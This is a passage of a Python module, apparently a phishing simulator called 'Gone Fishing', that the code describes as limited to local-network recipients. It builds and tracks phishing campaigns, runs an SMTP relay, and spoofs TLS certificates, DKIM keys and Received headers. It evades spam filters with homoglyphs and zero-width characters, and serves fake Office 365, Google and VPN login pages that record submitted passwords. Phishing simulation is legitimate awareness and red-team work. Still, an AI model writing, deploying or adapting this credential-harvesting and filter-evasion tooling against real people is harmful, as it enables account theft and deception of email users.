""", + "text": "Meeting Update: {{meeting_title}}\n\nHi {{name}},\n\n{{meeting_title}} has been updated.\nDate: {{date}} at {{time}}\nOrganizer: {{organizer}}\n\nView details: {{link}}", + }, +} + + +class TemplateManager: + """Manage email templates (built-in + custom).""" + + def __init__(self): + self._file = os.path.join(get_data_dir(), 'phishmail_templates.json') + self._custom = {} + self._load() + + def _load(self): + if os.path.exists(self._file): + try: + with open(self._file, 'r') as f: + self._custom = json.load(f) + except Exception: + self._custom = {} + + def _save(self): + os.makedirs(os.path.dirname(self._file), exist_ok=True) + with open(self._file, 'w') as f: + json.dump(self._custom, f, indent=2) + + def list_templates(self) -> Dict[str, dict]: + merged = {} + for name, tpl in _BUILTIN_TEMPLATES.items(): + merged[name] = {**tpl, 'builtin': True} + for name, tpl in self._custom.items(): + merged[name] = {**tpl, 'builtin': False} + return merged + + def get_template(self, name: str) -> Optional[dict]: + if name in self._custom: + return {**self._custom[name], 'builtin': False} + if name in _BUILTIN_TEMPLATES: + return {**_BUILTIN_TEMPLATES[name], 'builtin': True} + return None + + def save_template(self, name: str, html: str, text: str = '', subject: str = ''): + self._custom[name] = {'html': html, 'text': text, 'subject': subject} + self._save() + + def delete_template(self, name: str) -> bool: + if name in self._custom: + del self._custom[name] + self._save() + return True + return False + + +# ── Campaign Manager ───────────────────────────────────────────────────────── + +class CampaignManager: + """Manage phishing campaigns with tracking.""" + + def __init__(self): + self._file = os.path.join(get_data_dir(), 'phishmail_campaigns.json') + self._campaigns = {} + self._load() + + def _load(self): + if os.path.exists(self._file): + try: + with open(self._file, 'r') as f: + self._campaigns = json.load(f) + except Exception: + self._campaigns = {} + + def _save(self): + os.makedirs(os.path.dirname(self._file), exist_ok=True) + with open(self._file, 'w') as f: + json.dump(self._campaigns, f, indent=2) + + def create_campaign(self, name: str, template: str, targets: List[str], + from_addr: str, from_name: str, subject: str, + smtp_host: str = '127.0.0.1', smtp_port: int = 25) -> str: + cid = uuid.uuid4().hex[:12] + self._campaigns[cid] = { + 'id': cid, + 'name': name, + 'template': template, + 'targets': [ + {'email': t.strip(), 'id': uuid.uuid4().hex[:8], + 'status': 'pending', 'sent_at': None, 'opened_at': None, + 'clicked_at': None} + for t in targets if t.strip() + ], + 'from_addr': from_addr, + 'from_name': from_name, + 'subject': subject, + 'smtp_host': smtp_host, + 'smtp_port': smtp_port, + 'created': datetime.now().isoformat(), + 'status': 'draft', + } + self._save() + return cid + + def get_campaign(self, cid: str) -> Optional[dict]: + return self._campaigns.get(cid) + + def list_campaigns(self) -> List[dict]: + return list(self._campaigns.values()) + + def delete_campaign(self, cid: str) -> bool: + if cid in self._campaigns: + del self._campaigns[cid] + self._save() + return True + return False + + def update_target_status(self, cid: str, target_id: str, + field: str, value: str): + camp = self._campaigns.get(cid) + if not camp: + return + for t in camp['targets']: + if t['id'] == target_id: + t[field] = value + break + self._save() + + def record_open(self, cid: str, target_id: str): + self.update_target_status(cid, target_id, 'opened_at', + datetime.now().isoformat()) + + def record_click(self, cid: str, target_id: str): + self.update_target_status(cid, target_id, 'clicked_at', + datetime.now().isoformat()) + + def get_stats(self, cid: str) -> dict: + camp = self._campaigns.get(cid) + if not camp: + return {} + targets = camp.get('targets', []) + total = len(targets) + sent = sum(1 for t in targets if t.get('sent_at')) + opened = sum(1 for t in targets if t.get('opened_at')) + clicked = sum(1 for t in targets if t.get('clicked_at')) + return { + 'total': total, 'sent': sent, 'opened': opened, + 'clicked': clicked, + 'open_rate': f"{opened/sent*100:.1f}%" if sent else '0%', + 'click_rate': f"{clicked/sent*100:.1f}%" if sent else '0%', + } + + +# ── SMTP Relay Server ──────────────────────────────────────────────────────── + +class _SMTPHandler: + """Simple SMTP receiver using raw sockets (no aiosmtpd dependency).""" + + def __init__(self, host='0.0.0.0', port=2525): + self.host = host + self.port = port + self._sock = None + self._running = False + self._thread = None + self._received = [] + + def start(self): + if self._running: + return + self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + self._sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + self._sock.settimeout(2) + self._sock.bind((self.host, self.port)) + self._sock.listen(5) + self._running = True + self._thread = threading.Thread(target=self._accept_loop, daemon=True) + self._thread.start() + + def stop(self): + self._running = False + if self._sock: + try: + self._sock.close() + except Exception: + pass + if self._thread: + self._thread.join(timeout=5) + + def _accept_loop(self): + while self._running: + try: + conn, addr = self._sock.accept() + threading.Thread(target=self._handle_client, + args=(conn, addr), daemon=True).start() + except socket.timeout: + continue + except Exception: + if self._running: + continue + break + + def _handle_client(self, conn, addr): + """Minimal SMTP conversation handler.""" + try: + conn.settimeout(30) + conn.sendall(b'220 Gone Fishing SMTP Ready\r\n') + mail_from = '' + rcpt_to = [] + data_buf = b'' + while True: + line = b'' + while not line.endswith(b'\r\n'): + chunk = conn.recv(1) + if not chunk: + return + line += chunk + cmd = line.decode('utf-8', errors='replace').strip().upper() + + if cmd.startswith('EHLO') or cmd.startswith('HELO'): + conn.sendall(b'250-Gone Fishing\r\n250 OK\r\n') + elif cmd.startswith('MAIL FROM'): + mail_from = line.decode('utf-8', errors='replace').split(':', 1)[1].strip().strip('<>') + conn.sendall(b'250 OK\r\n') + elif cmd.startswith('RCPT TO'): + rcpt = line.decode('utf-8', errors='replace').split(':', 1)[1].strip().strip('<>') + rcpt_to.append(rcpt) + conn.sendall(b'250 OK\r\n') + elif cmd == 'DATA': + conn.sendall(b'354 End data with .\r\n') + data_buf = b'' + while True: + chunk = conn.recv(4096) + if not chunk: + break + data_buf += chunk + if data_buf.endswith(b'\r\n.\r\n'): + break + self._received.append({ + 'from': mail_from, + 'to': rcpt_to, + 'data': data_buf.decode('utf-8', errors='replace'), + 'time': datetime.now().isoformat(), + 'addr': addr, + }) + conn.sendall(b'250 OK\r\n') + elif cmd == 'QUIT': + conn.sendall(b'221 Bye\r\n') + break + elif cmd.startswith('STARTTLS'): + conn.sendall(b'454 TLS not available on relay\r\n') + else: + conn.sendall(b'500 Unknown command\r\n') + except Exception: + pass + finally: + try: + conn.close() + except Exception: + pass + + @property + def received_count(self): + return len(self._received) + + +# ── Gone Fishing Server ───────────────────────────────────────────────────── + +class GoneFishingServer: + """Main phishing mail service combining SMTP relay, sender, and tracking.""" + + def __init__(self): + self.templates = TemplateManager() + self.campaigns = CampaignManager() + self.landing_pages = LandingPageManager() + self.evasion = EmailEvasion() + self.dkim = DKIMHelper() + self._relay = None + self._tracking_events = [] + + @property + def relay_running(self) -> bool: + return self._relay is not None and self._relay._running + + def start_relay(self, host: str = '0.0.0.0', port: int = 2525): + if self._relay and self._relay._running: + return {'ok': True, 'message': 'Relay already running'} + self._relay = _SMTPHandler(host, port) + self._relay.start() + return {'ok': True, 'message': f'SMTP relay started on {host}:{port}'} + + def stop_relay(self): + if self._relay: + self._relay.stop() + self._relay = None + return {'ok': True, 'message': 'Relay stopped'} + + def relay_status(self) -> dict: + if self._relay and self._relay._running: + return { + 'running': True, + 'host': self._relay.host, + 'port': self._relay.port, + 'received': self._relay.received_count, + } + return {'running': False} + + def generate_cert(self, cn: str = 'mail.example.com', + org: str = 'Example Inc', + ou: str = '', locality: str = '', + state: str = '', country: str = 'US', + days: int = 365) -> dict: + """Generate a spoofed self-signed TLS certificate.""" + cert_dir = os.path.join(get_data_dir(), 'certs', 'phishmail') + os.makedirs(cert_dir, exist_ok=True) + + safe_cn = cn.replace('/', '_').replace('\\', '_').replace(' ', '_') + cert_path = os.path.join(cert_dir, f'{safe_cn}.crt') + key_path = os.path.join(cert_dir, f'{safe_cn}.key') + + subj_parts = [f'/CN={cn}'] + if org: + subj_parts.append(f'/O={org}') + if ou: + subj_parts.append(f'/OU={ou}') + if locality: + subj_parts.append(f'/L={locality}') + if state: + subj_parts.append(f'/ST={state}') + if country: + subj_parts.append(f'/C={country}') + subj = ''.join(subj_parts) + + try: + subprocess.run([ + 'openssl', 'req', '-x509', '-newkey', 'rsa:2048', + '-keyout', key_path, '-out', cert_path, + '-days', str(days), '-nodes', + '-subj', subj, + ], check=True, capture_output=True) + return { + 'ok': True, 'cert': cert_path, 'key': key_path, + 'cn': cn, 'org': org, + 'message': f'Certificate generated: {safe_cn}.crt', + } + except FileNotFoundError: + return {'ok': False, 'error': 'OpenSSL not found — install OpenSSL to generate certificates'} + except subprocess.CalledProcessError as e: + return {'ok': False, 'error': f'OpenSSL error: {e.stderr.decode(errors="replace")}'} + + def list_certs(self) -> List[dict]: + cert_dir = os.path.join(get_data_dir(), 'certs', 'phishmail') + if not os.path.isdir(cert_dir): + return [] + certs = [] + for f in os.listdir(cert_dir): + if f.endswith('.crt'): + name = f[:-4] + key_exists = os.path.exists(os.path.join(cert_dir, f'{name}.key')) + certs.append({'name': name, 'cert': f, 'has_key': key_exists}) + return certs + + def _build_message(self, config: dict) -> MIMEMultipart: + """Build a MIME email message from config.""" + msg = MIMEMultipart('alternative') + msg['From'] = f"{config.get('from_name', '')} <{config['from_addr']}>" + msg['To'] = ', '.join(config.get('to_addrs', [])) + msg['Subject'] = config.get('subject', '') + msg['Reply-To'] = config.get('reply_to', config['from_addr']) + msg['X-Mailer'] = config.get('x_mailer', 'Microsoft Outlook 16.0') + msg['Message-ID'] = f"<{uuid.uuid4().hex}@{config['from_addr'].split('@')[-1]}>" + msg['Date'] = datetime.now().strftime('%a, %d %b %Y %H:%M:%S %z') or \ + datetime.now().strftime('%a, %d %b %Y %H:%M:%S +0000') + + # Evasion: additional headers + if config.get('x_priority'): + msg['X-Priority'] = config['x_priority'] + if config.get('x_originating_ip'): + msg['X-Originating-IP'] = f"[{config['x_originating_ip']}]" + if config.get('return_path'): + msg['Return-Path'] = config['return_path'] + if config.get('list_unsubscribe'): + msg['List-Unsubscribe'] = config['list_unsubscribe'] + + # Evasion: spoofed Received headers + for received in config.get('received_headers', []): + msg['Received'] = received + + # Custom headers + for hdr_name, hdr_val in config.get('custom_headers', {}).items(): + msg[hdr_name] = hdr_val + + # Text part + text_body = config.get('text_body', '') + if text_body: + msg.attach(MIMEText(text_body, 'plain')) + + # HTML part + html_body = config.get('html_body', '') + if html_body: + # Apply evasion if requested + evasion_mode = config.get('evasion_mode', '') + if evasion_mode == 'homoglyph': + html_body = self.evasion.homoglyph_text(html_body) + elif evasion_mode == 'zero_width': + html_body = self.evasion.zero_width_insert(html_body) + elif evasion_mode == 'html_entity': + html_body = self.evasion.html_entity_encode(html_body) + msg.attach(MIMEText(html_body, 'html')) + + # Attachments + for filepath in config.get('attachments', []): + if os.path.isfile(filepath): + part = MIMEBase('application', 'octet-stream') + with open(filepath, 'rb') as f: + part.set_payload(f.read()) + encoders.encode_base64(part) + part.add_header('Content-Disposition', 'attachment', + filename=os.path.basename(filepath)) + msg.attach(part) + + return msg + + def _inject_tracking(self, html: str, campaign_id: str, + target_id: str, base_url: str = '') -> str: + """Inject tracking pixel and rewrite links for click tracking.""" + if not base_url: + base_url = 'http://127.0.0.1:8181' + + # Tracking pixel + pixel_url = f"{base_url}/phishmail/track/pixel/{campaign_id}/{target_id}" + pixel_tag = f'' + html = html.replace('{{tracking_pixel}}', pixel_tag) + + # Link rewriting — replace href values with tracking redirects + import re + link_counter = [0] + + def _rewrite_link(match): + original = match.group(1) + if 'track/pixel' in original or 'track/click' in original: + return match.group(0) + link_id = link_counter[0] + link_counter[0] += 1 + import base64 + encoded = base64.urlsafe_b64encode(original.encode()).decode() + track_url = f"{base_url}/phishmail/track/click/{campaign_id}/{target_id}/{encoded}" + return f'href="{track_url}"' + + html = re.sub(r'href="([^"]+)"', _rewrite_link, html) + return html + + def send_email(self, config: dict) -> dict: + """Send a single email. + + Config keys: from_addr, from_name, to_addrs (list), subject, + html_body, text_body, attachments (list of paths), + smtp_host, smtp_port, use_tls, cert_cn (for TLS cert lookup). + """ + to_addrs = config.get('to_addrs', []) + if isinstance(to_addrs, str): + to_addrs = [a.strip() for a in to_addrs.split(',') if a.strip()] + + # Validate all recipients are local + for addr in to_addrs: + ok, msg = _validate_local_only(addr) + if not ok: + return {'ok': False, 'error': msg} + + smtp_host = config.get('smtp_host', '127.0.0.1') + smtp_port = int(config.get('smtp_port', 25)) + use_tls = config.get('use_tls', False) + + config['to_addrs'] = to_addrs + message = self._build_message(config) + + try: + if use_tls: + # Look for spoofed cert + cert_cn = config.get('cert_cn', '') + if cert_cn: + cert_dir = os.path.join(get_data_dir(), 'certs', 'phishmail') + safe_cn = cert_cn.replace('/', '_').replace('\\', '_').replace(' ', '_') + cert_path = os.path.join(cert_dir, f'{safe_cn}.crt') + key_path = os.path.join(cert_dir, f'{safe_cn}.key') + if os.path.exists(cert_path) and os.path.exists(key_path): + import ssl as _ssl + ctx = _ssl.create_default_context() + ctx.check_hostname = False + ctx.verify_mode = _ssl.CERT_NONE + ctx.load_cert_chain(cert_path, key_path) + server = smtplib.SMTP(smtp_host, smtp_port, timeout=15) + server.starttls(context=ctx) + else: + server = smtplib.SMTP(smtp_host, smtp_port, timeout=15) + server.starttls() + else: + server = smtplib.SMTP(smtp_host, smtp_port, timeout=15) + server.starttls() + else: + server = smtplib.SMTP(smtp_host, smtp_port, timeout=15) + + server.sendmail(config['from_addr'], to_addrs, message.as_string()) + server.quit() + return {'ok': True, 'message': f'Email sent to {len(to_addrs)} recipient(s)'} + except smtplib.SMTPException as e: + return {'ok': False, 'error': f'SMTP error: {e}'} + except ConnectionRefusedError: + return {'ok': False, 'error': f'Connection refused: {smtp_host}:{smtp_port}'} + except Exception as e: + return {'ok': False, 'error': str(e)} + + def send_campaign(self, cid: str, base_url: str = '', + delay: float = 1.0) -> dict: + """Send all emails in a campaign with tracking injection.""" + camp = self.campaigns.get_campaign(cid) + if not camp: + return {'ok': False, 'error': 'Campaign not found'} + + tpl = self.templates.get_template(camp['template']) + if not tpl: + return {'ok': False, 'error': f"Template '{camp['template']}' not found"} + + # Validate all targets first + for t in camp['targets']: + ok, msg = _validate_local_only(t['email']) + if not ok: + return {'ok': False, 'error': f"Target {t['email']}: {msg}"} + + sent = 0 + errors = [] + for t in camp['targets']: + html = tpl.get('html', '') + text = tpl.get('text', '') + subject = camp.get('subject', tpl.get('subject', '')) + + # Variable substitution + vars_map = { + '{{name}}': t['email'].split('@')[0].replace('.', ' ').title(), + '{{email}}': t['email'], + '{{company}}': camp.get('from_name', 'Company'), + '{{date}}': datetime.now().strftime('%B %d, %Y'), + '{{link}}': f'{base_url}/phishmail/track/click/{cid}/{t["id"]}/landing', + } + for var, val in vars_map.items(): + html = html.replace(var, val) + text = text.replace(var, val) + subject = subject.replace(var, val) + + # Inject tracking + html = self._inject_tracking(html, cid, t['id'], base_url) + + config = { + 'from_addr': camp['from_addr'], + 'from_name': camp['from_name'], + 'to_addrs': [t['email']], + 'subject': subject, + 'html_body': html, + 'text_body': text, + 'smtp_host': camp.get('smtp_host', '127.0.0.1'), + 'smtp_port': camp.get('smtp_port', 25), + } + + result = self.send_email(config) + if result['ok']: + self.campaigns.update_target_status( + cid, t['id'], 'status', 'sent') + self.campaigns.update_target_status( + cid, t['id'], 'sent_at', datetime.now().isoformat()) + sent += 1 + else: + errors.append(f"{t['email']}: {result['error']}") + self.campaigns.update_target_status( + cid, t['id'], 'status', 'failed') + + if delay > 0: + time.sleep(delay) + + # Update campaign status + camp_data = self.campaigns.get_campaign(cid) + if camp_data: + camp_data['status'] = 'sent' + self.campaigns._save() + + if errors: + return {'ok': True, 'sent': sent, 'errors': errors, + 'message': f'Sent {sent}/{len(camp["targets"])} emails, {len(errors)} failed'} + return {'ok': True, 'sent': sent, + 'message': f'Campaign sent to {sent} target(s)'} + + def setup_dns_for_domain(self, domain: str, mail_host: str = '', + spf_allow: str = '') -> dict: + """Auto-configure DNS records for a spoofed domain via the DNS service. + + Creates zone + MX + SPF + DMARC records if the DNS service is running. + """ + try: + from core.dns_service import get_dns_service + dns = get_dns_service() + if not dns.is_running(): + return {'ok': False, 'error': 'DNS service not running'} + + # Create zone if it doesn't exist + dns.create_zone(domain) + + # Setup mail records + result = dns.setup_mail_records( + domain, + mx_host=mail_host or f'mail.{domain}', + spf_allow=spf_allow or 'ip4:127.0.0.1', + ) + return result + except ImportError: + return {'ok': False, 'error': 'DNS service module not available'} + except Exception as e: + return {'ok': False, 'error': str(e)} + + def dns_status(self) -> dict: + """Check if DNS service is available and running.""" + try: + from core.dns_service import get_dns_service + dns = get_dns_service() + return {'available': True, 'running': dns.is_running()} + except Exception: + return {'available': False, 'running': False} + + def test_smtp(self, host: str, port: int = 25, timeout: int = 5) -> dict: + """Test SMTP connectivity to a server.""" + try: + server = smtplib.SMTP(host, port, timeout=timeout) + banner = server.ehlo_resp or server.helo_resp + server.quit() + return { + 'ok': True, + 'message': f'Connected to {host}:{port}', + 'banner': banner.decode(errors='replace') if isinstance(banner, bytes) else str(banner), + } + except Exception as e: + return {'ok': False, 'error': str(e)} + + +# ── Landing Page & Credential Harvesting ────────────────────────────────────── + +_LANDING_TEMPLATES = { + "Office 365 Login": { + "html": """ +Sign in to your account + +""", + "fields": ["email", "password"], + }, + "Google Login": { + "html": """ +Sign in - Google Accounts + +
+

Sign in

Use your Google Account

+
+ + +
Forgot email?
""", + "fields": ["email", "password"], + }, + "Generic Login": { + "html": """ +Login Required + +

Login Required

Please sign in to continue

+
+ + +
""", + "fields": ["username", "password"], + }, + "VPN Login": { + "html": """ +VPN Portal - Authentication Required + +
🛡

VPN Portal

Authentication required to connect

+
+ + + +
+

This connection is encrypted and monitored

""", + "fields": ["username", "password", "otp"], + }, +} + + +class LandingPageManager: + """Manage phishing landing pages and captured credentials.""" + + def __init__(self): + self._data_dir = os.path.join(get_data_dir(), 'phishmail') + self._pages_file = os.path.join(self._data_dir, 'landing_pages.json') + self._captures_file = os.path.join(self._data_dir, 'captures.json') + self._pages = {} + self._captures = [] + self._load() + + def _load(self): + os.makedirs(self._data_dir, exist_ok=True) + for attr, path in [('_pages', self._pages_file), ('_captures', self._captures_file)]: + if os.path.exists(path): + try: + with open(path, 'r') as f: + setattr(self, attr, json.load(f)) + except Exception: + pass + + def _save_pages(self): + os.makedirs(self._data_dir, exist_ok=True) + with open(self._pages_file, 'w') as f: + json.dump(self._pages, f, indent=2) + + def _save_captures(self): + os.makedirs(self._data_dir, exist_ok=True) + with open(self._captures_file, 'w') as f: + json.dump(self._captures, f, indent=2) + + def list_builtin(self) -> dict: + return {name: {'fields': t['fields'], 'builtin': True} for name, t in _LANDING_TEMPLATES.items()} + + def list_pages(self) -> dict: + result = {} + for name, t in _LANDING_TEMPLATES.items(): + result[name] = {'fields': t['fields'], 'builtin': True} + for pid, page in self._pages.items(): + result[page.get('name', pid)] = {**page, 'id': pid, 'builtin': False} + return result + + def get_page(self, name_or_id: str) -> Optional[dict]: + if name_or_id in _LANDING_TEMPLATES: + return {**_LANDING_TEMPLATES[name_or_id], 'builtin': True} + if name_or_id in self._pages: + return {**self._pages[name_or_id], 'builtin': False} + # Search by name + for pid, page in self._pages.items(): + if page.get('name') == name_or_id: + return {**page, 'id': pid, 'builtin': False} + return None + + def create_page(self, name: str, html: str, redirect_url: str = '', + fields: list = None) -> str: + pid = uuid.uuid4().hex[:10] + self._pages[pid] = { + 'name': name, 'html': html, 'redirect_url': redirect_url, + 'fields': fields or ['username', 'password'], + 'created': datetime.now().isoformat(), + } + self._save_pages() + return pid + + def delete_page(self, pid: str) -> bool: + if pid in self._pages: + del self._pages[pid] + self._save_pages() + return True + return False + + def record_capture(self, page_id: str, form_data: dict, + request_info: dict = None) -> dict: + """Record captured credentials from a landing page submission.""" + # Filter out hidden tracking fields + creds = {k: v for k, v in form_data.items() if not k.startswith('_')} + + capture = { + 'id': uuid.uuid4().hex[:10], + 'page': page_id, + 'campaign': form_data.get('_campaign', ''), + 'target': form_data.get('_target', ''), + 'credentials': creds, + 'timestamp': datetime.now().isoformat(), + } + if request_info: + capture['ip'] = request_info.get('ip', '') + capture['user_agent'] = request_info.get('user_agent', '') + capture['referer'] = request_info.get('referer', '') + + self._captures.append(capture) + # Keep last 10000 captures + if len(self._captures) > 10000: + self._captures = self._captures[-10000:] + self._save_captures() + return capture + + def get_captures(self, campaign_id: str = '', page_id: str = '') -> list: + results = self._captures + if campaign_id: + results = [c for c in results if c.get('campaign') == campaign_id] + if page_id: + results = [c for c in results if c.get('page') == page_id] + return results + + def clear_captures(self, campaign_id: str = '') -> int: + if campaign_id: + before = len(self._captures) + self._captures = [c for c in self._captures if c.get('campaign') != campaign_id] + count = before - len(self._captures) + else: + count = len(self._captures) + self._captures = [] + self._save_captures() + return count + + def render_page(self, name_or_id: str, campaign_id: str = '', + target_id: str = '', target_email: str = '') -> Optional[str]: + """Render a landing page with tracking variables injected.""" + page = self.get_page(name_or_id) + if not page: + return None + html = page['html'] + html = html.replace('{{campaign_id}}', campaign_id) + html = html.replace('{{target_id}}', target_id) + html = html.replace('{{email}}', target_email) + return html + + +# ── Email Evasion Helpers ────────────────────────────────────────────────── + +class EmailEvasion: + """Techniques to improve email deliverability and bypass filters.""" + + @staticmethod + def homoglyph_text(text: str) -> str: + """Replace some chars with Unicode homoglyphs to bypass text filters.""" + _MAP = {'a': '\u0430', 'e': '\u0435', 'o': '\u043e', 'p': '\u0440', + 'c': '\u0441', 'x': '\u0445', 'i': '\u0456'} + import random + result = [] + for ch in text: + if ch.lower() in _MAP and random.random() < 0.3: + result.append(_MAP[ch.lower()]) + else: + result.append(ch) + return ''.join(result) + + @staticmethod + def zero_width_insert(text: str) -> str: + """Insert zero-width chars to break keyword matching.""" + import random + zwchars = ['\u200b', '\u200c', '\u200d', '\ufeff'] + result = [] + for ch in text: + result.append(ch) + if ch.isalpha() and random.random() < 0.15: + result.append(random.choice(zwchars)) + return ''.join(result) + + @staticmethod + def html_entity_encode(text: str) -> str: + """Encode some chars as HTML entities.""" + import random + result = [] + for ch in text: + if ch.isalpha() and random.random() < 0.2: + result.append(f'&#x{ord(ch):x};') + else: + result.append(ch) + return ''.join(result) + + @staticmethod + def randomize_headers() -> dict: + """Generate randomized but realistic email headers.""" + import random + mailers = [ + 'Microsoft Outlook 16.0', 'Microsoft Outlook 15.0', + 'Thunderbird 102.0', 'Apple Mail (2.3654)', + 'Evolution 3.44', 'The Bat! 10.4', + ] + priorities = ['1 (Highest)', '3 (Normal)', '5 (Lowest)'] + return { + 'x_mailer': random.choice(mailers), + 'x_priority': random.choice(priorities), + 'x_originating_ip': f'10.{random.randint(0,255)}.{random.randint(0,255)}.{random.randint(1,254)}', + } + + @staticmethod + def spoof_received_chain(from_domain: str, hops: int = 2) -> list: + """Generate fake Received headers to look like legitimate mail flow.""" + import random + servers = ['mx', 'relay', 'gateway', 'edge', 'smtp', 'mail', 'mta'] + chain = [] + prev = f'{random.choice(servers)}.{from_domain}' + for i in range(hops): + next_srv = f'{random.choice(servers)}{i+1}.{from_domain}' + ip = f'10.{random.randint(0,255)}.{random.randint(0,255)}.{random.randint(1,254)}' + ts = datetime.now().strftime('%a, %d %b %Y %H:%M:%S +0000') + chain.append(f'from {prev} ({ip}) by {next_srv} with ESMTPS; {ts}') + prev = next_srv + return chain + + +# ── DKIM Helper ────────────────────────────────────────────────────────────── + +class DKIMHelper: + """Generate DKIM keys and sign emails.""" + + @staticmethod + def generate_keypair(domain: str) -> dict: + """Generate RSA keypair for DKIM signing.""" + key_dir = os.path.join(get_data_dir(), 'phishmail', 'dkim') + os.makedirs(key_dir, exist_ok=True) + + priv_path = os.path.join(key_dir, f'{domain}.key') + pub_path = os.path.join(key_dir, f'{domain}.pub') + + try: + subprocess.run([ + 'openssl', 'genrsa', '-out', priv_path, '2048' + ], check=True, capture_output=True) + subprocess.run([ + 'openssl', 'rsa', '-in', priv_path, + '-pubout', '-out', pub_path + ], check=True, capture_output=True) + + with open(pub_path, 'r') as f: + pub_key = f.read() + # Extract just the key data (strip PEM headers) + lines = [l for l in pub_key.strip().split('\n') + if not l.startswith('-----')] + dns_key = ''.join(lines) + + return { + 'ok': True, + 'private_key': priv_path, + 'public_key': pub_path, + 'dns_record': f'v=DKIM1; k=rsa; p={dns_key}', + 'selector': 'default', + 'domain': domain, + } + except FileNotFoundError: + return {'ok': False, 'error': 'OpenSSL not found'} + except subprocess.CalledProcessError as e: + return {'ok': False, 'error': f'OpenSSL error: {e.stderr.decode(errors="replace")}'} + + @staticmethod + def list_keys() -> list: + key_dir = os.path.join(get_data_dir(), 'phishmail', 'dkim') + if not os.path.isdir(key_dir): + return [] + keys = [] + for f in os.listdir(key_dir): + if f.endswith('.key'): + domain = f[:-4] + pub_exists = os.path.exists(os.path.join(key_dir, f'{domain}.pub')) + keys.append({'domain': domain, 'has_pub': pub_exists}) + return keys + + @staticmethod + def sign_message(msg_str: str, domain: str, + selector: str = 'default') -> Optional[str]: + """Sign a message with DKIM. Returns the DKIM-Signature header value.""" + try: + import dkim + key_path = os.path.join(get_data_dir(), 'phishmail', 'dkim', f'{domain}.key') + if not os.path.exists(key_path): + return None + with open(key_path, 'rb') as f: + private_key = f.read() + sig = dkim.sign(msg_str.encode(), + selector.encode(), + domain.encode(), + private_key) + return sig.decode() + except ImportError: + return None + except Exception: + return None + + +# ── Singleton ──────────────────────────────────────────────────────────────── + +_instance = None +_lock = threading.Lock() + + +def get_gone_fishing() -> GoneFishingServer: + global _instance + if _instance is None: + with _lock: + if _instance is None: + _instance = GoneFishingServer() + return _instance + + +# ── Interactive CLI ────────────────────────────────────────────────────────── + +def run(): + """Interactive CLI for Gone Fishing Mail Service.""" + server = get_gone_fishing() + + while True: + print("\n" + "=" * 60) + print(" GONE FISHING MAIL SERVICE") + print(" Local network phishing simulator") + print("=" * 60) + relay_status = "RUNNING" if server.relay_running else "STOPPED" + print(f" SMTP Relay: {relay_status}") + print() + print(" 1 — Compose & Send Email") + print(" 2 — Manage Campaigns") + print(" 3 — Manage Templates") + print(" 4 — Start/Stop SMTP Relay") + print(" 5 — Generate Spoofed Certificate") + print(" 6 — View Tracking Stats") + print(" 7 — Test SMTP Connection") + print(" 0 — Back") + print() + + choice = input(" Select: ").strip() + + if choice == '0': + break + elif choice == '1': + _cli_compose(server) + elif choice == '2': + _cli_campaigns(server) + elif choice == '3': + _cli_templates(server) + elif choice == '4': + _cli_relay(server) + elif choice == '5': + _cli_generate_cert(server) + elif choice == '6': + _cli_tracking(server) + elif choice == '7': + _cli_test_smtp(server) + + +def _cli_compose(server: GoneFishingServer): + """Compose and send a single email.""" + print("\n--- Compose Email ---") + from_name = input(" From Name: ").strip() or "IT Department" + from_addr = input(" From Address: ").strip() or "it@company.local" + to_input = input(" To (comma-separated): ").strip() + if not to_input: + print(" [!] No recipients specified") + return + + to_addrs = [a.strip() for a in to_input.split(',') if a.strip()] + + # Validate + for addr in to_addrs: + ok, msg = _validate_local_only(addr) + if not ok: + print(f" [!] {msg}") + return + + subject = input(" Subject: ").strip() or "Test Email" + + # Template selection + templates = server.templates.list_templates() + print("\n Available templates:") + tpl_list = list(templates.keys()) + for i, name in enumerate(tpl_list, 1): + tag = " (built-in)" if templates[name].get('builtin') else "" + print(f" {i} — {name}{tag}") + print(f" 0 — Custom (enter HTML manually)") + + tpl_choice = input(" Template: ").strip() + html_body = '' + text_body = '' + + if tpl_choice == '0' or not tpl_choice: + html_body = input(" HTML Body (or press Enter for plain text): ").strip() + if not html_body: + text_body = input(" Plain Text Body: ").strip() + else: + try: + idx = int(tpl_choice) - 1 + if 0 <= idx < len(tpl_list): + tpl = templates[tpl_list[idx]] + html_body = tpl.get('html', '') + text_body = tpl.get('text', '') + if tpl.get('subject') and not subject: + subject = tpl['subject'] + print(f" Using template: {tpl_list[idx]}") + else: + print(" [!] Invalid template selection") + return + except ValueError: + print(" [!] Invalid selection") + return + + smtp_host = input(" SMTP Host [127.0.0.1]: ").strip() or "127.0.0.1" + smtp_port = input(" SMTP Port [25]: ").strip() or "25" + use_tls = input(" Use TLS? [y/N]: ").strip().lower() == 'y' + + config = { + 'from_addr': from_addr, + 'from_name': from_name, + 'to_addrs': to_addrs, + 'subject': subject, + 'html_body': html_body, + 'text_body': text_body, + 'smtp_host': smtp_host, + 'smtp_port': int(smtp_port), + 'use_tls': use_tls, + } + + print("\n Sending...") + result = server.send_email(config) + if result['ok']: + print(f" [+] {result['message']}") + else: + print(f" [-] {result['error']}") + + +def _cli_campaigns(server: GoneFishingServer): + """Campaign management CLI.""" + while True: + print("\n--- Campaign Management ---") + campaigns = server.campaigns.list_campaigns() + if campaigns: + for c in campaigns: + stats = server.campaigns.get_stats(c['id']) + print(f" [{c['id']}] {c['name']} — " + f"Status: {c['status']}, " + f"Targets: {stats.get('total', 0)}, " + f"Sent: {stats.get('sent', 0)}, " + f"Opened: {stats.get('opened', 0)}") + else: + print(" No campaigns yet") + + print("\n 1 — Create Campaign") + print(" 2 — Send Campaign") + print(" 3 — Delete Campaign") + print(" 0 — Back") + + choice = input(" Select: ").strip() + if choice == '0': + break + elif choice == '1': + name = input(" Campaign Name: ").strip() + if not name: + continue + templates = server.templates.list_templates() + tpl_list = list(templates.keys()) + print(" Templates:") + for i, t in enumerate(tpl_list, 1): + print(f" {i} — {t}") + tpl_idx = input(" Template #: ").strip() + try: + template = tpl_list[int(tpl_idx) - 1] + except (ValueError, IndexError): + print(" [!] Invalid template") + continue + targets = input(" Targets (comma-separated emails): ").strip() + if not targets: + continue + target_list = [t.strip() for t in targets.split(',') if t.strip()] + from_addr = input(" From Address: ").strip() or "it@company.local" + from_name = input(" From Name: ").strip() or "IT Department" + subject = input(" Subject: ").strip() or templates[template].get('subject', 'Notification') + smtp_host = input(" SMTP Host [127.0.0.1]: ").strip() or "127.0.0.1" + smtp_port = input(" SMTP Port [25]: ").strip() or "25" + + cid = server.campaigns.create_campaign( + name, template, target_list, from_addr, from_name, + 